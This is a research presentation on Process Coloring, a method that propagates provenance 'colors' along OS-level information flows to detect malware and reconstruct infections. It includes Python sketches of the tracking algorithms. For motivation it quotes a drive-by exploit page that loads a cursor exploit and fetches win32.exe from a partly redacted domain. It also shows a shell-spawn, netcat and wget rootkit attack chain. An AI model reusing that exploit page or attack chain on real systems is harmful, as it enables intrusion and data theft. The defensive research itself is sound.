Process Coloring: an Information Flow-Preserving Approach to Malware Investigation
Eugene Spafford, Dongyan Xu (Presenter)
Department of Computer Science and Center for Education and Research in Information Assurance and Security (CERIAS)
Purdue University
Xuxian Jiang
Department of Information and Software Engineering
George Mason University
NICIAR Site Visit, West Lafayette, IN, July 19, 2007
Motivation
Internet malware remains a top threat.
Malware: viruses, worms, rootkits, spyware, bots, …
Motivation
Upon clicking a malicious URL, http://xxx.9x.xx8.8x/users/xxxx/xxx/laxx/z.html
Result: 22 unwanted programs are installed without the user’s consent!
Vulnerabilities exploited: MS04-013, MS03-011, MS05-002
<html><head><title></title></head><body>
<style>* {CURSOR: url("http://vxxxxxxe.biz/adverts/033/sploit.anr")}</style>
<APPLET ARCHIVE='count.jar' CODE='BlackBox.class' WIDTH=1 HEIGHT=1><PARAM NAME='url' VALUE='http://vxxxxxxe.biz/adverts/033/win32.exe'></APPLET><script>
try{document.write('<object data=`ms-its:mhtml:file://C:\fo'+'o.mht!'+'http://vxxxx'+'xxe.biz//adv'+'erts//033//targ.ch'+'m::/targ'+'et.htm` type=`text/x-scriptlet`></ob'+'ject>');}catch(e){} </script>
</body></html>
Motivation
Our Challenge: Enabling Timely, Efficient Malware Investigation
• Raising a timely alert to trigger a malware investigation
• Identifying the break-in point of the malware
• Reconstructing all contaminations by the malware
[Figure: timeline from infection to the external detection point. Today’s log-based intrusion investigation tools (e.g., BackTracker, Taser) use the log to trace back to the break-in point and then reconstruct the contamination.]
Limitations of Today’s Tools
• Long “infection-to-detection” interval
• Entire log needed for both trace-back and reconstruction
• Questionable trustworthiness of log data
Goals of Research
Improve the malware defense capabilities of enterprise computing infrastructure:
• Detection of malware activity
• Identification of vulnerable programs/applications
• Accountability of computation activities
• Recoverability from malware contaminations
• Proactive protection of sensitive information/data
Demonstrate success via metrics of timeliness, efficiency, and accuracy
Goals of Research
The goals fit within two NICECAP research themes:
• “Accountable information flows”: based on information flow theory, instantiated at the operating system level, holding malware accountable
• “Large-scale system defense”: targeting large-scale malware infection (e.g., botnets), enabling malware detection and remediation, providing a first line of response (applicable to legacy applications without source code)
Technical Approach: Process Coloring
Key idea: propagating malware break-in provenance information (“colors”) along OS-level information flows
• Existing tools consider only direct causality relations, without preserving and exploiting break-in provenance information
Runtime alert triggered by log color anomalies
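[Figure: system architecture. Apache, Sendmail, DNS, and MySQL run on a guest OS in a virtual machine on top of a virtual machine monitor (VMM); a logger records the log and a log monitor watches it while an attacker targets the services.]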
New Capabilities of Process Coloring
• Color-based malware warning (vs. external detection point)
• Color-based break-in point identification (vs. back-tracking)
• Color-based log partitioning for reconstruction (vs. entire log)
[Figure: timeline of infection, break-in point, detection, and contamination reconstruction under process coloring]
Impact of Success
How will it benefit the NIC?
• Accountability of NIC cyber infrastructure
• Readiness against current and emerging malware threats to the NIC (e.g., botnets, rootkits, spyware)
• Protection of NIC critical data, information, and computation activities
• Reduction of NIC human labor in malware investigation
Impact of Success
How will it benefit the IA community?
• Systematic model for OS-level information flows
• Mechanisms and policies for elevated accountability of commodity OSes
• Tools and methods for malware alert, investigation, and recovery
• Artifacts, data, insights, and lessons for further malware research
Sample Scenario
[Figure: httpd spawns /bin/sh, which starts netcat (reading /etc/shadow and confidential info), modifies local files, and runs wget to fetch a rootkit; an alert is raised]
Question 1: How is the malware detected?
Question 2: How does the malware break into the system?
Question 3: What does the malware do after break-in?
“httpd” READS an incoming request
“httpd” CREATES a new process “/bin/sh”
“/bin/sh” CREATES a new process “netcat”
“netcat” READS “/etc/shadow” file
“/bin/sh” MODIFIES local files
“/bin/sh” CREATES a new process “wget”
“wget” CREATES local file(s) - “Root kit”
Existing Approach
1. Online log collection
[Figure: the log is collected online; an alert at the external detection point (the rootkit created via httpd → /bin/sh → wget) starts backward tracking]
Existing Approach
2. Offline backward tracking
“wget” CREATES local file(s) - “Root kit”
“/bin/sh” CREATES a new process “wget”
“httpd” CREATES a new process “/bin/sh”
Break-in point! [King+, SOSP’03]
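The offline backward tracking step above can be sketched as follows. This is a minimal illustration under stated assumptions, not the BackTracker implementation from [King+, SOSP’03]. Each log event is modeled as a hypothetical (subject, operation, object) triple taken from the sample scenario. Backward tracking simply follows CREATE edges from the detection point until it reaches a node with no recorded creator, which it reports as the candidate break-in point.

```python
from typing import List, Optional, Tuple

# Hypothetical event format (an assumption, not the project's log format):
# (subject, operation, object), in log order, from the sample scenario.
Event = Tuple[str, str, str]

EVENTS: List[Event] = [
    ("httpd", "READ", "incoming request"),
    ("httpd", "CREATE", "/bin/sh"),
    ("/bin/sh", "CREATE", "netcat"),
    ("netcat", "READ", "/etc/shadow"),
    ("/bin/sh", "MODIFY", "local files"),
    ("/bin/sh", "CREATE", "wget"),
    ("wget", "CREATE", "rootkit"),
]


def creator_of(node: str, events: List[Event]) -> Optional[str]:
    """Return the subject that CREATEd `node`, or None if no such event is logged."""
    for subject, op, obj in events:
        if op == "CREATE" and obj == node:
            return subject
    return None


def backward_track(detection_point: str, events: List[Event]) -> List[str]:
    """Walk CREATE edges backward from the detection point.

    The last node in the returned chain has no recorded creator and is
    treated as the candidate break-in point.
    """
    chain = [detection_point]
    seen = {detection_point}
    parent = creator_of(detection_point, events)
    while parent is not None and parent not in seen:
        chain.append(parent)
        seen.add(parent)
        parent = creator_of(parent, events)
    return chain


print(" <- ".join(backward_track("rootkit", EVENTS)))
# rootkit <- wget <- /bin/sh <- httpd
```

Note that `creator_of` scans the whole log at every step. This mirrors the limitation listed earlier: trace-back needs the entire log.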
Existing Approach
3. Offline forward tracking from the break-in point (httpd):
“httpd” CREATES a new process “/bin/sh”
“/bin/sh” CREATES a new process “netcat”
“netcat” READS “/etc/shadow” file
“/bin/sh” MODIFIES local files
“/bin/sh” CREATES a new process “wget”
“wget” CREATES local file(s) - “Root kit”
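Forward tracking can be sketched as a breadth-first walk over the same kind of event triples. The sketch starts at the break-in point and collects every event whose subject has already been reached. The (subject, operation, object) format is again a hypothetical simplification of the log, and this is not Taser's or BackTracker's actual algorithm.

```python
from collections import defaultdict, deque
from typing import Dict, List, Set, Tuple

# Hypothetical event format (an assumption): (subject, operation, object).
Event = Tuple[str, str, str]

EVENTS: List[Event] = [
    ("httpd", "CREATE", "/bin/sh"),
    ("/bin/sh", "CREATE", "netcat"),
    ("netcat", "READ", "/etc/shadow"),
    ("/bin/sh", "MODIFY", "local files"),
    ("/bin/sh", "CREATE", "wget"),
    ("wget", "CREATE", "rootkit"),
]


def forward_track(break_in: str, events: List[Event]) -> List[Event]:
    """Return all events reachable from the break-in point via subject -> object edges."""
    by_subject: Dict[str, List[Event]] = defaultdict(list)
    for event in events:
        by_subject[event[0]].append(event)

    affected: List[Event] = []
    visited: Set[str] = {break_in}
    queue = deque([break_in])
    while queue:
        node = queue.popleft()
        for event in by_subject.get(node, []):
            affected.append(event)
            obj = event[2]
            if obj not in visited:
                visited.add(obj)
                queue.append(obj)
    return affected


for subject, op, obj in forward_track("httpd", EVENTS):
    print(f'"{subject}" {op} "{obj}"')
```

This sketch ignores timestamps, whereas a real forward tracker would follow only events that occur after a node became contaminated. On a busy server, starting from httpd would also pull in every legitimate request httpd served. That is the cost color-based log partitioning aims to reduce.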
Process Coloring Approach
[Figure: init runs the rc scripts s30sendmail, s45named, s55sshd, and s80httpd, giving each service its own color; the httpd color then spreads to /bin/sh, netcat, wget, the rootkit, local files, /etc/shadow, and confidential info]
1. Initial coloring
2. Coloring diffusion
Capability 1: Color-based malware warning
Capability 2: Color-based identification of break-in point
Capability 3: Color-based log partition for contamination analysis
...
BLUE: 673["sendmail"]: 5_open("/proc/loadavg", 0, 438) = 5
BLUE: 673["sendmail"]: 192_mmap2(0, 4096, 3, 34, 4294967295, 0) = 1073868800
BLUE: 673["sendmail"]: 3_read(5, "0.26 0.10 0.03 2...", 4096) = 25
BLUE: 673["sendmail"]: 6_close(5) = 0
BLUE: 673["sendmail"]: 91_munmap(1073868800, 4096) = 0
...
RED: 2568["httpd"]: 102_accept(16, sockaddr{2, cbbdff3a}, cbbdff38) = 5
RED: 2568["httpd"]: 3_read(5, "\1281\1\0\2\0\24...", 11) = 11
RED: 2568["httpd"]: 3_read(5, "\7\0À\5\0\128\3\...", 40) = 40
RED: 2568["httpd"]: 4_write(5, "\132@\4\0\1\0\2\...", 1090) = 1090
…
RED: 2568["httpd"]: 4_write(5, "\128\19Ê\136\18\...", 21) = 21
RED: 2568["httpd"]: 63_dup2(5, 2) = 2
RED: 2568["httpd"]: 63_dup2(5, 1) = 1
RED: 2568["httpd"]: 63_dup2(5, 0) = 0
RED: 2568["httpd"]: 11_execve("/bin//sh", bffff4e8, 00000000)
RED: 2568["sh"]: 5_open("/etc/ld.so.prelo...", 0, 8) = −2
RED: 2568["sh"]: 5_open("/etc/ld.so.cache", 0, 0) = 6
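The colored log above lends itself to color-based log partitioning (Capability 3). Below is a minimal sketch that assumes the entry layout seen in the sample: `COLOR: pid["comm"]: nr_syscall(args) = ret`. The regular expression, the `Entry` type, and the `partition` helper are hypothetical and inferred from the sample; this is not a documented log format. An entry carrying several colors (e.g. RED+BLUE) is placed in every matching partition.

```python
import re
from collections import defaultdict
from typing import Dict, FrozenSet, List, NamedTuple, Optional

# Entry layout inferred from the sample log (an assumption), e.g.
#   RED: 2568["httpd"]: 102_accept(16, sockaddr{2, cbbdff3a}, cbbdff38) = 5
ENTRY_RE = re.compile(
    r'^(?P<colors>[A-Z]+(?:\+[A-Z]+)*):\s*'
    r'(?P<pid>\d+)\s*\["(?P<comm>[^"]*)"\]:\s*'
    r'(?P<nr>\d+)_(?P<syscall>\w+)\((?P<args>.*)\)'
    r'(?:\s*=\s*(?P<ret>\S+))?$'
)


class Entry(NamedTuple):
    colors: FrozenSet[str]
    pid: int
    comm: str
    syscall: str
    ret: Optional[str]  # None when the entry has no "= value" part (e.g. execve)


def parse(line: str) -> Optional[Entry]:
    """Parse one colored log line; return None for elisions such as '...'."""
    m = ENTRY_RE.match(line.strip())
    if m is None:
        return None
    return Entry(
        colors=frozenset(m["colors"].split("+")),
        pid=int(m["pid"]),
        comm=m["comm"],
        syscall=m["syscall"],
        ret=m["ret"],
    )


def partition(lines: List[str]) -> Dict[str, List[Entry]]:
    """Group entries by color; mixed-color entries go into each of their partitions."""
    parts: Dict[str, List[Entry]] = defaultdict(list)
    for line in lines:
        entry = parse(line)
        if entry is not None:
            for color in entry.colors:
                parts[color].append(entry)
    return dict(parts)


SAMPLE = [
    'BLUE: 673["sendmail"]: 5_open("/proc/loadavg", 0, 438) = 5',
    'BLUE: 673["sendmail"]: 6_close(5) = 0',
    'RED: 2568["httpd"]: 102_accept(16, sockaddr{2, cbbdff3a}, cbbdff38) = 5',
    'RED: 2568["httpd"]: 63_dup2(5, 0) = 0',
    'RED: 2568["httpd"]: 11_execve("/bin//sh", bffff4e8, 00000000)',
]
parts = partition(SAMPLE)
print(len(parts["RED"]), "of", len(SAMPLE), "entries inspected for RED")
# 3 of 5 entries inspected for RED
```

Only the RED partition needs to be examined to reconstruct what the compromised httpd did, which is the source of the log reduction reported later.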
Timeliness by Process Coloring: Color-Based Malware Warning
Capability 1: Color-based malware warning: “unusual color inheritance”
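In the log above, the RED color of httpd is inherited by /bin/sh through execve. One way to turn that into a runtime warning is a per-color profile of the programs expected to run with each color. The sketch below assumes such a profile; `EXPECTED_PROGRAMS` and `check_exec` are hypothetical names, and the profile contents are illustrative rather than taken from the project.

```python
from typing import Dict, Optional, Set

# Hypothetical per-color profile (illustrative only): programs that are
# expected to run while carrying each color.
EXPECTED_PROGRAMS: Dict[str, Set[str]] = {
    "RED": {"httpd"},      # web server color
    "BLUE": {"sendmail"},  # mail server color
}


def check_exec(color: str, pid: int, program: str) -> Optional[str]:
    """Warn if a process of `color` execs a program outside that color's profile."""
    expected = EXPECTED_PROGRAMS.get(color, set())
    name = program.rsplit("/", 1)[-1]  # "/bin//sh" -> "sh"
    if name in expected:
        return None
    return f"WARNING: unusual color inheritance: {color} pid {pid} execs {program}"


print(check_exec("RED", 2568, "/bin//sh"))
# WARNING: unusual color inheritance: RED pid 2568 execs /bin//sh
```

A real profile would need to cover legitimate helpers (CGI scripts, for example) to keep false positives down. That trade-off is what the accuracy metrics later in the talk measure.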
Timeliness by Process Coloring: Color-Based Malware Warning
Another example: “color mixing”
RED: 1234 ["httpd"]: …
RED: 1234 ["httpd"]: …
RED: 1234 ["httpd"]: …
RED+BLUE: 1234 ["httpd"]: system call to read file index.html
[Figure: bind, httpd, and index.html; “cp defaced.html index.html” overwrites the page that httpd then reads]
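The color-mixing warning can be sketched by applying the READ rule, color(s) = color(s) ∪ color(o), and reporting when a subject's color set gains a color it did not have. The sketch assumes, for illustration, that index.html carries BLUE (the color that shows up in the RED+BLUE entry). The `colors` table and the `on_read` hook are hypothetical names.

```python
from typing import Dict, FrozenSet, Optional

# Hypothetical color state for the defacement example: httpd is RED, and
# index.html is assumed to carry BLUE after being overwritten.
colors: Dict[str, FrozenSet[str]] = {
    "httpd": frozenset({"RED"}),
    "index.html": frozenset({"BLUE"}),
}


def on_read(subject: str, obj: str) -> Optional[str]:
    """Apply color(s) = color(s) ∪ color(o); warn if the subject's colors become mixed."""
    before = colors.get(subject, frozenset())
    after = before | colors.get(obj, frozenset())
    colors[subject] = after
    if len(after) > 1 and after != before:
        # Keep the subject's original colors first, as in "RED+BLUE".
        label = "+".join(sorted(before) + sorted(after - before))
        return f"WARNING: color mixing: {subject} is now {label} after reading {obj}"
    return None


print(on_read("httpd", "index.html"))
# WARNING: color mixing: httpd is now RED+BLUE after reading index.html
```

The warning fires only on the read that introduces the new color, so repeated reads of the same page do not flood the monitor.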
Efficiency by Process Coloring
Worm                          Lion                   Slapper                  SARS
Time period being analyzed    24 hours               24 hours                 24 hours
# of worm-related entries     66,504                 195,884                  19,494
Exploited service             BIND (CVE-2001-0010)   Apache (CAN-2002-0656)   Samba (CAN-2003-0085)
% of log inspected            48.7%                  65.9%                    12.1%
Capability 2: Color-based break-in point identification
Capability 3: Color-based log partitioning
Accuracy by Process Coloring
• Accuracy of color-based malware warning
  - False positives and false negatives
• Accuracy of malware contamination reconstruction
  - Sufficiency of the log partition (“no useful log entries left out”)
  - Comparison of malware action graphs with published malware analysis reports
  - Limitations of causality-based reconstruction algorithms (e.g., BackTracker, Taser)
Accuracy of Malware Contamination Reconstruction: the Slapper Worm Example
[Figure: Slapper worm action graph. Nodes: inet_sock(80); fd 5; 2568: httpd; 2568 (execve): /bin//sh; 2568 (execve): /bin/bash -i; 2586: /bin/rm -rf /tmp/.bugtraq.c; 2587: /bin/cat; files /tmp/.uubugtraq and /tmp/.bugtraq.c. Edges are labeled with accept, recv, dup2, read, execve, fork, open, write, and unlink.]
Research Task I: Color Diffusion Model (Month 1-6)
Color Diffusion Model
OS-level information flows (s = subject, i.e. a process; o = object, e.g. a file):
Operation   Information flow    Color diffusion                      Syscalls
CREATE      create <s1, o1>     color(o1) = color(s1)                create, mkdir, link
            create <s1, s2>     color(s2) = color(s1)                fork, vfork, clone
READ        read <s1, o1>       color(s1) = color(s1) ∪ color(o1)    read, readv, recv
            read <s1, s2>       color(s1) = color(s1) ∪ color(s2)    ptrace
WRITE       write <s1, o1>      color(o1) = color(s1) ∪ color(o1)    write, writev, send
            write <s1, s2>      color(s2) = color(s1) ∪ color(s2)    ptrace, wait, signal
DESTROY     destroy <s1, o1>                                         unlink, rmdir, close
            destroy <s1, s2>                                         exit, kill
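The diffusion rules in the table can be expressed as a small state machine over color sets. The sketch below is an illustration, not the project's Linux/Xen implementation. `SYSCALL_OP` and `ColorState` are hypothetical names, and entities are identified by plain strings. ptrace is left out because the table lists it under both READ and WRITE. DESTROY leaves colors unchanged because the table gives no diffusion rule for it.

```python
from enum import Enum
from typing import Dict, FrozenSet

Colors = FrozenSet[str]


class Op(Enum):
    CREATE = "create"
    READ = "read"
    WRITE = "write"
    DESTROY = "destroy"


# Syscall-to-operation mapping taken from the table (ptrace omitted, see above).
SYSCALL_OP: Dict[str, Op] = {
    "create": Op.CREATE, "mkdir": Op.CREATE, "link": Op.CREATE,
    "fork": Op.CREATE, "vfork": Op.CREATE, "clone": Op.CREATE,
    "read": Op.READ, "readv": Op.READ, "recv": Op.READ,
    "write": Op.WRITE, "writev": Op.WRITE, "send": Op.WRITE,
    "wait": Op.WRITE, "signal": Op.WRITE,
    "unlink": Op.DESTROY, "rmdir": Op.DESTROY, "close": Op.DESTROY,
    "exit": Op.DESTROY, "kill": Op.DESTROY,
}


class ColorState:
    """Tracks the color set of every subject (process) and object (file, socket)."""

    def __init__(self) -> None:
        self.color: Dict[str, Colors] = {}

    def get(self, entity: str) -> Colors:
        return self.color.get(entity, frozenset())

    def apply(self, syscall: str, actor: str, target: str) -> None:
        """Apply the diffusion rule for `actor` (s1) invoking `syscall` on `target`.

        Raises KeyError for syscalls the table does not cover.
        """
        op = SYSCALL_OP[syscall]
        if op is Op.CREATE:
            # color(o1) = color(s1)  /  color(s2) = color(s1)
            self.color[target] = self.get(actor)
        elif op is Op.READ:
            # color(s1) = color(s1) ∪ color(target)
            self.color[actor] = self.get(actor) | self.get(target)
        elif op is Op.WRITE:
            # color(target) = color(s1) ∪ color(target)
            self.color[target] = self.get(actor) | self.get(target)
        # Op.DESTROY: no diffusion rule in the table, so colors stay as they are.


state = ColorState()
state.color["httpd"] = frozenset({"RED"})      # initial coloring (hypothetical colors)
state.color["sendmail"] = frozenset({"BLUE"})
state.apply("fork", "httpd", "/bin/sh")        # /bin/sh inherits RED
state.apply("write", "/bin/sh", "/tmp/shared") # /tmp/shared becomes RED
state.apply("read", "sendmail", "/tmp/shared") # sendmail now mixes BLUE and RED
print(sorted(state.get("sendmail")))
# ['BLUE', 'RED']
```

Because every rule either copies or unions color sets, colors only accumulate. That is what lets a late log entry still point back to the service where the break-in happened.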
Research Task II: Process Coloring for Client and Server Side Malware Investigation (Month 2-18)
• Server-side malware investigation
  - Consolidated server environment with independent server applications
  - “Clustered” information flows partitioned by server application
  - Color mixing between applications is highly unlikely
• Client-side malware investigation
  - Interdependent client applications (e.g., text editor → compiler; latex → dvips → ps2pdf)
  - More inter-application information flows
  - Legal color mixing exists
A motivating example of client-side process coloring:
[Figure: FTP and Quick Tax over time; their colors later appear together as FTP + Quick Tax]
Research Task III: Color Mixing Handling via Information Flow Control (Month 7-18)
Profiling legal color mixing inside a client host: shared files, helper processes
Approach 1: information flow insulation
Approach 2: information flow border control
[Figure: processes P1 and P2 with a shared file, shown without and with insulation]
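Profiling legal color mixing implies a check like the one below: before flagging a mixed color, consult a per-host profile. This is a minimal sketch, not the project's insulation or border-control mechanism. `LEGAL_MIXES`, `SHARED_FILES`, and `is_legal_mixing` are hypothetical, the profile contents are illustrative, and helper processes are not modeled.

```python
from typing import FrozenSet, Set

Colors = FrozenSet[str]

# Hypothetical client-host profile (illustrative values only).
LEGAL_MIXES: Set[Colors] = {frozenset({"EDITOR", "COMPILER"})}  # e.g. editor -> compiler
SHARED_FILES: Set[str] = {"/home/user/.bashrc"}


def is_legal_mixing(subject: Colors, obj: str, obj_colors: Colors) -> bool:
    """Decide whether reading `obj` mixes colors in a way the profile allows."""
    merged = subject | obj_colors
    if merged == subject:
        return True  # the read adds no new color
    if obj in SHARED_FILES:
        return True  # mixing through a profiled shared file
    return merged in LEGAL_MIXES  # a profiled combination of colors


print(is_legal_mixing(frozenset({"COMPILER"}), "/home/user/a.c", frozenset({"EDITOR"})))
print(is_legal_mixing(frozenset({"FTP"}), "/home/user/tax.dat", frozenset({"QUICKTAX"})))
```

The first call is allowed by the profiled editor/compiler pair. The second, an FTP process reading a Quick Tax file, is not in the profile and would be reported.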
Related Work Based on Information Flows
• Instruction-level information flows
  - Lacking system-wide semantic information (e.g., about processes and files)
• Language-level information flows
  - Focusing on information flows inside a program
• Operating-system-level information flows
  - Complementing the above categories
  - Revealing system-wide semantic information
  - Benefiting detection, recovery, and forensics as a first line of defense
Metrics: Definitions
• Timeliness: malware infection-to-warning interval
• Efficiency: percentage of log reduction for malware contamination reconstruction
• Accuracy: false positive rate of malware warning; false negative rate of malware warning; correctness of malware action graphs
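The metric definitions translate directly into small functions. The sketch assumes three things. Log reduction is taken as 100% minus the share of the log inspected. The false positive and false negative rates use the standard FP/(FP+TN) and FN/(FN+TP) definitions. Timeliness is measured on any consistent clock. The efficiency inputs are the "% of log inspected" values from the efficiency table above.

```python
from typing import Dict


def log_reduction(percent_inspected: float) -> float:
    """Efficiency, assuming reduction = 100% - share of the log that must be inspected."""
    return 100.0 - percent_inspected


def false_positive_rate(fp: int, tn: int) -> float:
    """Fraction of benign activity that raised a malware warning."""
    return fp / (fp + tn) if fp + tn else 0.0


def false_negative_rate(fn: int, tp: int) -> float:
    """Fraction of malware infections that raised no warning."""
    return fn / (fn + tp) if fn + tp else 0.0


def infection_to_warning(infection_ts: float, warning_ts: float) -> float:
    """Timeliness: interval between infection and the color-based warning."""
    return warning_ts - infection_ts


INSPECTED: Dict[str, float] = {"Lion": 48.7, "Slapper": 65.9, "SARS": 12.1}
for worm, pct in INSPECTED.items():
    print(f"{worm}: {log_reduction(pct):.1f}% log reduction")
# Lion: 51.3% log reduction
# Slapper: 34.1% log reduction
# SARS: 87.9% log reduction
```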
Metrics: Evaluation Plan
• Sources of malware: repository of malware (worms, botware, rootkits); malware captured by honeypots and a honeyfarm
• Target computing environments: consolidated servers; clients
• Experiment environments: VM-based honeyfarm (Collapsar); VM-based malware playground (vGround)
• Methodology: evaluation by comparison, with and without process coloring
Project Organization and Management
Purdue team
• Faculty: Eugene Spafford, Dongyan Xu
• Graduate students: Ryan Riley, Larissa O’Brien, TBD
• Budget: $xxx,xxx
George Mason team
• Faculty: Xuxian Jiang
• Graduate student: TBD
• Budget: $xxx,xxx
Project Organization and Management
[Figure: 18-month project schedule (Months 1-18) marked June 7th, 2007, showing experiments, software deliverables, quarterly program reviews, the site visit, and software demonstrations #1-#3]
Tasks:
1. Task I (Section 3.1)
2. Task II (Section 3.2): Subtasks II.1, II.2, II.3
3. Task III (Section 3.3): Subtasks III.1, III.2, III.3
4. Meetings and document preparation
5. Prototype instantiation
Software demonstrations:
#1 Basic Xen-based prototype
#2 Tools for malware investigation
#3 Mechanisms for color mixing control
Project Organization and Management
Spending during Summer ’07:
• Purdue: one month of graduate student support (half-time)
• GMU: one month of summer salary (planned)
Recent Progress
Current status:
• Identifying color diffusion operations in the Linux OS
• Starting to implement log coloring and collection on the Xen VMM
Projected Progress in the Next 3-6 Months
• 11/21/07: A comprehensive color diffusion model under Linux
• 12/07/07: Demo and software release of basic Xen-based prototype
Technology Transfer Plan
Potential adopters:
• Computer forensics/malware investigators and researchers
• System administrators
• Anti-malware software companies
• Open source communities (e.g., XenSource)
Transfer activities:
• Software release and documentation
• Presentations and demos to potential NIC adopters
• Presentations and demos to anti-malware software companies (Symantec, Microsoft, VMware)
Thank you!
For more information about the Process Coloring project:
http://cairo.cs.purdue.edu/projects/